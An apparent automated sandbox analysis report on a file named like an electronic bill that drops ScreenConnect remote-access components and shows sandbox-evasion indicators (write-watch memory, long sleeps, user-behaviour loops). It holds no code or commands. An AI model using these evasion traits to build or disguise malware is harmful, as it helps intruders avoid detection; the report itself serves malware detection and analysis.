Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 1F6B42B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 1F6CDB20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Memory allocated: 1280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Memory allocated: 1AD50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: E50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: 29D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: 49D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: 1C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: 1DF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Memory allocated: 1C10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Memory allocated: 8E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Memory allocated: 1A640000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599639	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599511	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599403	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599292	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599136	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598996	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598713	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598130	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597153	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595795	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595685	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595575	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595115	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594994	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594850	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593514	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592719	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 6869	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 2735	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Window / User API: threadDelayed 366

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\E_BILL9926378035.exe TID: 3244	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 4192	Thread sleep time: -600000s >= -30000s	Jump to behavior
